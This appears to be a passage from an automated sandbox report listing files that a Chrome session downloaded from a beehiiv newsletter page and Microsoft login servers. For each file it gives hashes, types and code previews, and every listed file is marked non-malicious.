                                                                                                                                            Preview:...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..|.-..x1.F...@...yRlG.O..5.Q.|.gy.c.^....r.EC.....xd.oL..$./..|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1.*.lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.......*..W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1
                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:1
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (14364), with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14364
                                                                                                                                            Entropy (8bit):5.551736975336459
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:NrMeTnVl29bmcbprfpo8yAMIU7OUMrUUfqWqWPM1O7mnkQ451d3hjCpkofFCYfLT:B7nKbHpo8yA56fMrUUVKgxzjCLfvn6m9
                                                                                                                                            MD5:1D49F4C3C45B56E3AF18C2090034C540
                                                                                                                                            SHA1:2E681B26E1666F538FFAD4346AF63D23F878ED32
                                                                                                                                            SHA-256:8D276B7B4595C15A09CD930AE582422FD0C8B2D03121CCE0035657E7DDEDF466
                                                                                                                                            SHA-512:79578AC1A03B2565B37B5382471A255A48C50619AAE3138E5391EF54FB4E1272752EB968E1B251E0C9E421A4F95EAD66FFA6815EEF705600DE209FE10BE603F4
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:!function(){var t={9638:function(t){"use strict";t.exports="data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iNDUiIGhlaWdodD0iNTIiIHZpZXdCb3g9IjAgMCA0NSA1MiIgZmlsbD0ibm9uZSIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj4KPHBhdGggZD0iTTMzLjA4NiAwSDI0LjIwNzRWMzUuNDIwM0MyNC4yMDc0IDM5LjY0MDYgMjAuNzkyNiA0My4xMDcyIDE2LjU0MyA0My4xMDcyQzEyLjI5MzQgNDMuMTA3MiA4Ljg3ODU4IDM5LjY0MDYgOC44Nzg1OCAzNS40MjAzQzguODc4NTggMzEuMjc1NCAxMi4yMTc1IDI3Ljg4NDEgMTYuMzE1MyAyNy43MzMzVjE4Ljg0MDZDNy4yODQ5OSAxOC45OTEzIDAgMjYuMzAxNCAwIDM1LjQyMDNDMCA0NC42MTQ1IDcuNDM2NzYgNTIgMTYuNjE4OSA1MkMyNS44MDEgNTIgMzMuMjM3OCA0NC41MzkxIDMzLjIzNzggMzUuNDIwM1YxNy4yNThDMzYuNTc2NyAxOS42Njk2IDQwLjY3NDUgMjEuMTAxNCA0NSAyMS4xNzY4VjEyLjI4NDFDMzguMzIyMSAxMi4wNTggMzMuMDg2IDYuNjMxODggMzMuMDg2IDBaIiBmaWxsPSIjMTYxODIzIi8+Cjwvc3ZnPgo="},4635:function(t,e,n){"use strict";n.r(e),n.d(e,{EMBED_TYPE:function(){return p},LIB_CDN_PREFIX:function(){return r},LIB_CSS_ID:function(){return i},LIB_SCRIPT_ID:function(){return o},LIB_VERSION_DEFAULT:function(){return u}
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (65447)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):89501
                                                                                                                                            Entropy (8bit):5.289893677458563
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                            MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                            SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                            SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                            SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                                                                            Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (4277)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):4640
                                                                                                                                            Entropy (8bit):5.378093745473255
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:QhdRN0eHgUYSyd+SqHLq4GXpY7+7UtXbG8XhBlCGRIYrPhQ:QDISyHqH/Kpk+UtaUhBQGRIuPhQ
                                                                                                                                            MD5:6C6BF9C773BD02502B100B9DF3B34AC8
                                                                                                                                            SHA1:FD2304FC4C7D9C5F1532ADCC4D35ED39B223D71B
                                                                                                                                            SHA-256:C45E9B52737091B1638F3216C7DAAD57309AFEF6DE9A8268EE3A7AD0A27F43FA
                                                                                                                                            SHA-512:1430DF5C22963AA62D52A82577C0E7CFACB1E9F9D9C7D5E341241A418BF3F1B60978738985D77B88CA7358D32CB29E5242EF9E05B48BDF7F14B6AE56AA2212B1
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/disclosure-OT1gpdxK.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="cbac7ffb-cf38-5e5b-b466-98be60764a11")}catch(e){}}();.import{e as b,r as n}from"./index-D6da9p6-.js";import{O as B,U as E,y as T,c as A,o as g,u as $,C as R,I as K,d as L,a as k,T as F}from"./keyboard-CaEu2o0u.js";import{s as N,d as v,u as H}from"./transition-y-5XFFuu.js";import{r as j}from"./bugs-DVQzBh-s.js";import{o as Q}from"./use-is-mounted-BaHv16bB.js";var M;let V=(M=b.startTransition)!=null?M:function(e){e()};var Y=(e=>(e[e.Open=0]="Open",e[e.Closed=1]="Closed",e))(Y||{}),Z=(e=>(e[e.ToggleDisclosure=0]="ToggleDisclosure",e[e.CloseDisclosure=1]="CloseDisclosure",e[e.SetButtonId=2]="SetButtonId",e[e.SetPanelId=3]="SetPanelId",e[e.LinkPanel=4]="LinkPanel",e[e.UnlinkPanel=5]="UnlinkPanel",e))(Z||{});let _={0:e=>({...e,disclosureState:$(e.disclosureState,{0:1,1:0})}),1:e=>e.dis
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):654
                                                                                                                                            Entropy (8bit):5.559620228053553
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:UgDGH4LOaOvCaBfuSkydENwhpavIJRfsLhomJUufsLha79vD8P2yb:UgqHHVvCaRuSky6NCavIJRf+5fR9vDTE
                                                                                                                                            MD5:22FBB78EFBA99FF16F53A9463CA67C65
                                                                                                                                            SHA1:07910364E5B93C7FB3B5500EC756700597DF7F9A
                                                                                                                                            SHA-256:3D5C9E39684D20D9D4F0300250BB84F3B3317E840CBC036B3281318AADE97259
                                                                                                                                            SHA-512:F79DDF623044BD69B7EB526D618C58958D20E3FB2A64CC7DA0216051B967FEB9B712F63CAB4D978DEA3FC64372E5909257122CCECC3A01172FEE8EA3A7EBE9F3
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="43a4c947-e766-5ba1-9194-70247d122a50")}catch(e){}}();.import{j as e}from"./jsx-runtime-BjG_zV1W.js";const a=({name:s,errorMessage:t="",successMessage:r=""})=>e.jsxs(e.Fragment,{children:[e.jsx("input",{hidden:!0,name:`${s}_error_message`,defaultValue:t}),e.jsx("input",{hidden:!0,name:`${s}_success_message`,defaultValue:r})]});export{a as S};.//# sourceMappingURL=StatusInputs-JkVhk_jg.js.map..//# debugId=43a4c947-e766-5ba1-9194-70247d122a50.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):1435
                                                                                                                                            Entropy (8bit):7.8613342322590265
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                                                                                            MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                                                                                            SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                                                                                            SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                                                                                            SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://logincdn.msauth.net/shared/5/images/microsoft_logo_ee5c8d9fb6248c938fd0.svg
                                                                                                                                            Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (4053)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):4621
                                                                                                                                            Entropy (8bit):5.373055159968663
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:QTQCy8z+rTC0C2Rse8Lf64/piDdyfSA1kO8r56MvpW4MBmqJwRWH:iQCyFrTC0C2RKT64/U+Z1wpQ4MBlwS
                                                                                                                                            MD5:D2E1C0131FAA15487A1BCF9DF88647C5
                                                                                                                                            SHA1:56E87BFD56C0616A9DDEFCB6CFD4316C88F0CC5A
                                                                                                                                            SHA-256:6F1121C76A0CB54C9CF040288BE272D7AC7ED7E11D6137E640C7CB5B9B54869D
                                                                                                                                            SHA-512:A06170037F07BF4F0C0E2AA6AF71F8B77F699298C34A4437408B73C0CA0954C54BF20FCAA10633BA81EE8BB8923780CA4D74FE5DF3DECFF4903E782F253460B4
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/index-COqk5b7U.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="9608f3cb-02a3-5a46-9c88-098c61e68b74")}catch(e){}}();.import{r as o}from"./index-D6da9p6-.js";import"./components-Oj2xMfGE.js";function d(){return d=Object.assign?Object.assign.bind():function(e){for(var r=1;r<arguments.length;r++){var n=arguments[r];for(var t in n)Object.prototype.hasOwnProperty.call(n,t)&&(e[t]=n[t])}return e},d.apply(this,arguments)}function w(e,r=[]){let n=[];function t(s,l){const c=o.createContext(l),i=n.length;n=[...n,l];function f($){const{scope:u,children:x,...p}=$,y=u?.[e][i]||c,V=o.useMemo(()=>p,Object.values(p));return o.createElement(y.Provider,{value:V},x)}function h($,u){const x=u?.[e][i]||c,p=o.useContext(x);if(p)return p;if(l!==void 0)return l;throw new Error(`\`${$}\` must be used within \`${s}\``)}return f.displayName=s+"Provider",[f,h]}const a=
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):3452
                                                                                                                                            Entropy (8bit):5.117912766689607
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
                                                                                                                                            MD5:CB06E9A552B197D5C0EA600B431A3407
                                                                                                                                            SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                                                                                                            SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                                                                                                            SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://login.live.com/Me.htm?v=3
                                                                                                                                            Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (40452), with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):40452
                                                                                                                                            Entropy (8bit):5.330891307568951
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:yrgIi8sdjoDZ2MoqHN3n2PZPuzHBVnY6wdjMT4bTQe7UA/X+U+iYoX4LFQnlzlGK:yrgIi8sdjoDZJoqHN3n2PZPuzHBVnY6o
                                                                                                                                            MD5:36028D980F179F0D7CD5BE7D6D3A8BCF
                                                                                                                                            SHA1:7802F522E387E83804FC4449E5C4277F827896DE
                                                                                                                                            SHA-256:C309D791BC16D3C39599A116ABE7BBBE7D164722B0EBC186A1AB29A687C82621
                                                                                                                                            SHA-512:F473124ACCF753D83B961EAF2051A07187853DF801CC19309F9C2368213CA046C27F7078F97DFC452777C1F3602EECC7734664A1324098C08B26652B5CB8BDB0
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:!function(){var t={723:function(t,n,r){"use strict";function e(t){!i.length&&o(),i[i.length]=t}t.exports=e;var o,i=[],u=0;function c(){for(;u<i.length;){var t=u;if(u+=1,i[t].call(),u>1024){for(var n=0,r=i.length-u;n<r;n++)i[n]=i[n+u];i.length-=u,u=0}}i.length=0,u=0}var a=void 0!==r.g?r.g:self,f=a.MutationObserver||a.WebKitMutationObserver;o="function"==typeof f?function(t){var n=1,r=new f(t),e=document.createTextNode("");return r.observe(e,{characterData:!0}),function(){n=-n,e.data=n}}(c):s(c),e.requestFlush=o;function s(t){return function(){var n=setTimeout(e,0),r=setInterval(e,50);function e(){clearTimeout(n),clearInterval(r),t()}}}e.makeRequestCallFromTimer=s},2691:function(t,n,r){r("9115"),r("774"),r("522"),r("8295"),r("7842"),r("110"),r("75"),r("4336"),r("9371"),r("8837"),r("6773"),r("5745"),r("3057"),r("3750"),r("3369"),r("9564"),r("2000"),r("8977"),r("2310"),r("4899"),r("1842"),r("6997"),t.exports=r("5645").Array},4963:function(t){t.exports=function(t){if("function"!=typeof t)th
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (2631), with CRLF line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):2752
                                                                                                                                            Entropy (8bit):5.66276025443587
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:t1XXw+kOhX/BxVgnK/Q6GiuGq9juwbae13NhcKBLd4rVGuXXsa6r0oLEakit5IIQ:H9W3iuV96wDrHBZ4ojDoQEr0mn/
                                                                                                                                            MD5:FE1AF12858D27A7FDED8862C1B11427E
                                                                                                                                            SHA1:9B1EB519EB129474491D05B1965176963779D6F7
                                                                                                                                            SHA-256:9EB0313D76919C4DC31CA8325D46622648D422E1CBDD1001800CF6AD8986878B
                                                                                                                                            SHA-512:936884CEDFA19361684A7042375825810F61EE45D94C64BF40231FC96DF65DBFEC179C24364B403C028B2F7237C9F5ABB8A9642FB599260A1B61D165D07A740F
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://fpt2.microsoft.com/Clear.HTML?ctx=Ls1.0&wl=False&session_id=d811912f5bba4f73bc2c1cacef83fd6e&id=4f2d6f39-9285-f80c-0305-98081a8143af&w=8DD3590B586C7D6&tkt=taBcrIH61PuCVH7eNCyH0FFaWZWIHTJWSYlBtG47cVtwnBoDi1yEQgyMjR4%252bSpZKCpdn1qpYY4Xeyx2UeY2NVGmyrHbx%252fgU0SU%252fi5B%252biFRKWlrIDZFXZ5Wn3w9Eh4mOjXopdOkewg8kFy%252bXHvw5RR0V%252f4BR2YpQORbjNqU567PDq7j77MNkpZyqZV4soFr8EmIde66GR7MAd40GdvKNSuMg9Th0jLh8lqWkkQqelBhr987exo2Y%252bg2jfuAmWkoESqj7zV9VfL94kvxnKvejpqlSKXpHEfTnFrhR1jYec1iiEUi4aweFAwrh5BQMHsUe%252f&CustomerId=33e01921-4d64-4f8c-a055-5bdaffd5e33d
                                                                                                                                            Preview:<!DOCTYPE html>..<html xmlns="http://www.w3.org/1999/xhtml">..<head>.. <title></title>..</head>..<script>function BaseStamp() { this.GetStorageQsInfo = function () { if (window.localStorage) { var n = window.localStorage.getItem(lsKey); var lsupd = "False"; if (lsupd === "true" && n) { var xhr = new XMLHttpRequest(), method = "GET", url = target + "updatels.html?ofid=" + n + "&session_id=" + sid + "&CustomerId=" + cid; xhr.open(method, url, true); xhr.onreadystatechange = function () { if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) { var update = xhr.responseText; if (update && update.toLowerCase() === "true") { window.localStorage.setItem(lsKey, id); } } }; xhr.send(); } if (n && n != null && n != "" || (window.localStorage.setItem(lsKey, id), n = id), id != n) return "session_id=" + sid + "&CustomerId=" + cid + "&fid=" + id + "&ofid=" + n + "&w=" + ticks + "&auth=" + encodeURIComponent(authKey) } return "" }; this.newXMLHttp = function () { var n = null; return
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (3486)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):3850
                                                                                                                                            Entropy (8bit):5.20886063483284
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:JWkEyNHdAuiBI+0t+e2n26e7c5QrhmkFyuvK9sajqRRBspZCRBwCb8PH6K80uMC:QSGu5we2npehhTvK9IRRBspZ8wCYPI5n
                                                                                                                                            MD5:FBBF9D5AB1828027B77A0ED443670074
                                                                                                                                            SHA1:3A70F68898380AED561F007B83D47A4FFD087BD1
                                                                                                                                            SHA-256:F5FC9FC22259D24F00ADDD54FB79F2214DA4E9B9B9842E3C5DA1C1256C8FD8EF
                                                                                                                                            SHA-512:D1D29FC625BA9625B325E852C108020B6AED7684B4DAF19C75F4409B648A190483FE9D961D81C771FA2AEE732D15056074A2695963368EBC061F0A4B08BE6F74
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/YoutubeIcon-DSouMQiN.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="51ff9e43-d9cc-508d-8e8e-c64b9dda2bd2")}catch(e){}}();.import{j as s}from"./jsx-runtime-BjG_zV1W.js";import{c as t}from"./index-x2da_zcv.js";const r=({className:e,fill:c})=>s.jsx("svg",{className:t(e),xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",fill:c,children:s.jsx("path",{d:"M24 12.073c0-6.627-5.373-12-12-12s-12 5.373-12 12c0 5.99 4.388 10.954 10.125 11.854v-8.385H7.078v-3.47h3.047V9.43c0-3.007 1.792-4.669 4.533-4.669 1.312 0 2.686.235 2.686.235v2.953H15.83c-1.491 0-1.956.925-1.956 1.874v2.25h3.328l-.532 3.47h-2.796v8.385C19.612 23.027 24 18.062 24 12.073z"})}),i=({className:e,fill:c})=>s.jsx("svg",{className:t(e),xmlns:"http://www.w3.org/2000/svg",width:"24",height:"24",viewBox:"0 0 24 24",fill:c,children:s.jsx("path",{d:"M12 2.163c3.204 0 3.584.012 4.85.07 3.252.148
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):2591
                                                                                                                                            Entropy (8bit):5.552175625514921
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:ejOEaHFujOEaU8FZjjOEa2jOEai43rjOEatNjOEaEJc+uXjOEaoN0xD:aOEalqOEaU8FZHOEayOEax3vOEaLOEaQ
                                                                                                                                            MD5:CBB71CF58DFDD36EC2369E1614DE4AE1
                                                                                                                                            SHA1:191CA433A300D786DA415F3541BC53028EBFDFCB
                                                                                                                                            SHA-256:0C5433710AED5E054A330AC4311CEC4D79ECEAD1D1E9ED0CD21AD593E36E458B
                                                                                                                                            SHA-512:F62ADA0A36856B2F32F76101E6252650F24B6A01D26888BF40EA6CE42ABEE5243521AFF2AED93E6C13AEDED8233AD04538A044A13B38F53D81DDE4F76771B7DF
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://fonts.googleapis.com/css2?family=Inter&display=swap
                                                                                                                                            Preview:/* cyrillic-ext */.@font-face {. font-family: 'Inter';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/inter/v18/UcCO3FwrK3iLTeHuS_nVMrMxCp50SjIw2boKoduKmMEVuLyfAZJhiI2B.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Inter';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/inter/v18/UcCO3FwrK3iLTeHuS_nVMrMxCp50SjIw2boKoduKmMEVuLyfAZthiI2B.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Inter';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/inter/v18/UcCO3FwrK3iLTeHuS_nVMrMxCp50SjIw2boKoduKmMEVuLyfAZNhiI2B.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-family: 'Inter';. font-sty
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (574)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):933
                                                                                                                                            Entropy (8bit):5.49963112387479
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:UgqHHVvCaRuSIjNHec3/C5+vjZN1iYF+hO2P/T5I66aX5Z8AF6m:JWkE0jN+cvN0w+pP/T5IraXT8AF6m
                                                                                                                                            MD5:2CD767AF2062FD0FAAD9E1E172D99EEA
                                                                                                                                            SHA1:2F78631992C4FEDF7E3FEE0326BAB64E3C7B87BA
                                                                                                                                            SHA-256:DA68D7C47C7D3AB4E1CEAD74EE42915A222C8CD716FBD841E2B7C99AA3D64313
                                                                                                                                            SHA-512:EA4D35737346687AFF0F8E5B3AFBEC1B9D41F2B1AA5375A665A91533F243844EC1DC94010601A96B6D2B917944EE22B8FBCE4E4BAA68D0A76AD09029F1291296
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/hidden-KuoXmiN5.js
